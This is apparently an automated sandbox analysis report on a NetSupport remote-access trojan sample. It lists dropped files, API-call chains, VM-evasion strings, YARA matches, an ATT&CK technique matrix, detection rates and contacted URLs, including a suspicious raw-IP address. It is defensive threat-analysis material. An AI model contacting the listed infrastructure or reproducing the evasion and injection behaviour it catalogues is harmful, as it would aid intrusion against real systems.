                                Source: C:\Users\Public\Downloads\bild.exeWindow / User API: threadDelayed 468Jump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeWindow / User API: threadDelayed 3592Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Downloads\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Downloads\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Downloads\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Downloads\bild.exeEvaded block: after key decisiongraph_1-91509
                                Source: C:\Users\Public\Downloads\bild.exeEvaded block: after key decisiongraph_1-93383
                                Source: C:\Users\Public\Downloads\bild.exeEvaded block: after key decisiongraph_1-97257
                                Source: C:\Users\Public\Downloads\bild.exeEvaded block: after key decisiongraph_1-96858
                                Source: C:\Users\Public\Downloads\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-96997
                                Source: C:\Users\Public\Downloads\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-96649
                                Source: C:\Users\Public\Downloads\bild.exeAPI coverage: 6.2 %
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C764F301_2_6C764F30
                                Source: C:\Users\Public\Downloads\bild.exe TID: 5000Thread sleep time: -1144000s >= -30000sJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exe TID: 2104Thread sleep time: -46800s >= -30000sJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exe TID: 5000Thread sleep time: -898000s >= -30000sJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\Public\Downloads\bild.exeLast function: Thread delayed
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C763130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C763226h1_2_6C763130
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_009FA273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A0A537
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,1_2_11065890
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,1_2_1106A0A0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,1_2_111266E0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,1_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0C8D5 VirtualQuery,GetSystemInfo,0_2_00A0C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: file.exe, 00000000.00000003.1666782617.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.clayl*
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: bild.exe, 00000001.00000002.3510425370.000000000341C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000001.00000002.3509543073.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: file.exe, 00000000.00000003.1666782617.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\B
                                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-23538
                                Source: C:\Users\Public\Downloads\bild.exeAPI call chain: ExitProcess graph end nodegraph_1-91577
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0DA75
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,1_2_11147750
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,1_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A14A5A mov eax, dword ptr fs:[00000030h]0_2_00A14A5A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A18AAA GetProcessHeap,0_2_00A18AAA
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0DA75
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0DBC3 SetUnhandledExceptionFilter,0_2_00A0DBC3
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A15B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A15B53
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A0DD7C
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,1_2_11093080
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,1_2_110310C0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_11161D01
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1116DD89
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7728E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6C7728E1
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C7787F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C7787F5
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,1_2_110F4560
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,1_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Downloads\bild.exe "C:\Users\Public\Downloads\bild.exe" Jump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,1_2_1109E190
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,1_2_1109E910
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0D8CB cpuid 0_2_00A0D8CB
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A0932F
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_11173A35
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_11173D69
                                Source: C:\Users\Public\Downloads\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11173CC6
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoA,1_2_1116B38E
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_11173933
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_111739DA
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_1117383E
                                Source: C:\Users\Public\Downloads\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11173D2D
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_11173C06
                                Source: C:\Users\Public\Downloads\bild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_6C78DC56
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_6C781CC1
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoA,1_2_6C78DC99
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_6C781DB6
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_6C781E5D
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_6C781EB8
                                Source: C:\Users\Public\Downloads\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,1_2_6C78DB7C
                                Source: C:\Users\Public\Downloads\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_6C782089
                                Source: C:\Users\Public\Downloads\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_6C782175
                                Source: C:\Users\Public\Downloads\bild.exeCode function: EnumSystemLocalesA,1_2_6C782151
                                Source: C:\Users\Public\Downloads\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_6C7821DC
                                Source: C:\Users\Public\Downloads\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,1_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00A0C131
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,1_2_1103B160
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FA8E0 GetVersionExW,0_2_009FA8E0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,1_2_11070090
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,1_2_110D8200
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_6C75A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,1_2_6C75A980
                                Source: Yara matchFile source: 1.2.bild.exe.6ca20000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.f20000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.bild.exe.f20000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.6ca00000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.4f04800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.6c750000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000000.1666036569.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1663707824.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.3509543073.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7068, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 1456, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Downloads\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Downloads\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Downloads\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Downloads\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Downloads\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Downloads\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                12
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                2
                                Valid Accounts
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                1
                                Windows Service
                                21
                                Access Token Manipulation
                                2
                                Software Packing
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                Login Hook1
                                Windows Service
                                1
                                DLL Side-Loading
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                4
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script13
                                Process Injection
                                1
                                Masquerading
                                LSA Secrets251
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                                Valid Accounts
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Virtualization/Sandbox Evasion
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                file.exe50%ReversingLabsWin32.Trojan.NetSupport
                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Downloads\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Downloads\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Downloads\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Downloads\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Downloads\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Downloads\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Downloads\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Downloads\remcmdstub.exe13%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.1.231
                                truefalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    unknown
                                    http://185.215.113.64/fakeurl.htmtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.pci.co.uk/supportfile.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        unknown
                                        http://%s/testpage.htmwininet.dllbild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                          unknown
                                          http://geo.netsupportsoftware.com/esbild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              unknown
                                              http://geo.netsupportsoftware.com/location/loca.asp(Ebild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                  unknown
                                                  http://www.symauth.com/rpa00file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://geo.netsupportsoftware.com/location/loca.aspXbild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                      unknown
                                                      http://%s/testpage.htmbild.exe, bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                        unknown
                                                        http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                          unknown
                                                          http://127.0.0.1bild.exe, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            unknown
                                                            http://www.symauth.com/cps0(file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
